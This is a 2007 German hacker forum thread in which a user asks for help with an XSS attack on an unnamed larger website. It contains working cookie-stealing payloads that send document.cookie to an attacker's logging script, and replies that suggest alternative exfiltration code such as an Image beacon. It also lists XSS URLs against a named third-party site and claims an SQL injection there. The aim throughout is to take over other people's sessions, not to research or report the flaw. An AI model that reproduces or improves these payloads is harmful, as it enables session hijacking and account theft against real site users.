#1 23. Juni 2007 Hi, ich hab eine XSS Lücke in einer etwas größeren Seite gefunden. Die Lücke lässt sich leider nur mit stark modifizierten Javascriptcode ausführen und dahen gibts ein kleines Problem. Der aktuelle Code ist wie folgt: Code: ';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\';document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//\";document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")//--></SCRIPT>">'><SCRIPT>document.write("<img src=http://xxxxxxx/s.php?cookie="+document.cookie+">")</SCRIPT> Nur das Problem ist das ich jetzt nur folgenden Inhalt in meiner cookielogdatei bekomme: Code: \\\" document.cookie \\\" Wer mir beim Problem hilft bekommt die Lücke als kleines Dankeschön natürlich auch per PN und eine nette Bewertung von mir und vielleicht auch von Crewmembern. MfG Roadkiller + Multi-Zitat Zitieren
#3 23. Juni 2007 AW: Problem mit XSS alert befehle gehen aber ohne probleme, er kann auch den cookie mit alert(document.cookie) ausgeben + Multi-Zitat Zitieren
#4 23. Juni 2007 AW: Problem mit XSS probiers dochma ohne " und ' also document.write('part1vondeinemimg-code'); (das wird ja richtig geschrieben.. document.write(document.cookie); document.write('der rest " />'); oder so.. ^^ oder geht das so nich? + Multi-Zitat Zitieren
#5 23. Juni 2007 AW: Problem mit XSS a propos, die xss lücken bei technorocker sind nicht behoben: http://technorocker.info/tracks.php?a=>"><ScriPt >alert('xss by b0b')%3B%3C/ScriPt%3E http://technorocker.info/tracks.php?a=>"><scrIpt>alert('xss by b0b')</scrIpt> http://technorocker.info/tracks.php?b=>"><scrIpt>alert('xss by b0b')</scrIpt> ausserdem ist die GET-variablen "e" sql-injection anfällig.. technorockr wurde informiert + Multi-Zitat Zitieren
#6 23. Juni 2007 AW: Problem mit XSS telefonzelle, ne dann geht das überhaupt nicht mehr + Multi-Zitat Zitieren
#7 23. Juni 2007 AW: Problem mit XSS Andere Variante: Anstelle von document.write einfach n neues Bild machen: var img = new Image(); img.src = 'http://cookie/saver.php?'+document.cookie; ? + Multi-Zitat Zitieren
#8 23. Juni 2007 AW: Problem mit XSS ne das hilft mir auch nicht weiter Kennt sich den niemand richtig gut mit XSS und Javascript aus? + Multi-Zitat Zitieren
#9 24. Juni 2007 AW: Problem mit XSS Wenn du uns nicht verräts wo die Lücke ist könnten wir(ich) schlecht ausprobieren, also post doch url oder schick sie per pn mfg rushzero + Multi-Zitat Zitieren